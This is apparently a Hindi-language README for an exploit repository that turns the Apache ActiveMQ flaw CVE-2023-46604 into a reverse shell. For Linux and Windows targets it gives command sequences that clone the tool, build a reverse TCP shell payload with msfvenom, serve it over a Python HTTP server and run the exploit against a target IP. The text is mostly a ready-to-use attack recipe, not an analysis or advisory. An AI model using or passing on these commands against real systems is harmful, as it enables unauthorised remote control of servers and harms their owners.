
Apache ActiveMQ (CVE_2023-46604) के लिए रिवर्स शेल शोषण प्राप्त करना
यह एक्सप्लॉइट मूल कार्य पर आधारित है जो https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE) पर उपलब्ध है। हमने मेटास्प्लॉइट फ्रेमवर्क (https://github.com/rapid7/metasploit-framework) का उपयोग करके रिवर्स शेल प्राप्त करने की तकनीक को और विकसित किया है।
महत्वपूर्ण: XML फ़ाइलों में IP पता (0.0.0.0 पंक्ति 11 पर) को उस IP पते से मैन्युअल रूप से बदलें जहाँ पेलोड उत्पन्न किया जाएगा। यदि आप नीचे दिए गए कमांड का पालन करते हैं तो यह आपका Listner IP पता होगा। साथ ही {IP_Of_Hosted_XML_File} आपका Listner IP पता होगा।
Linux/Unix लक्ष्यों के लिए
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
Windows लक्ष्यों के लिए
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml



https://github.com/Anon4mous को विशेष धन्यवाद जिन्होंने सक्रिय रूप से मेरा समर्थन किया।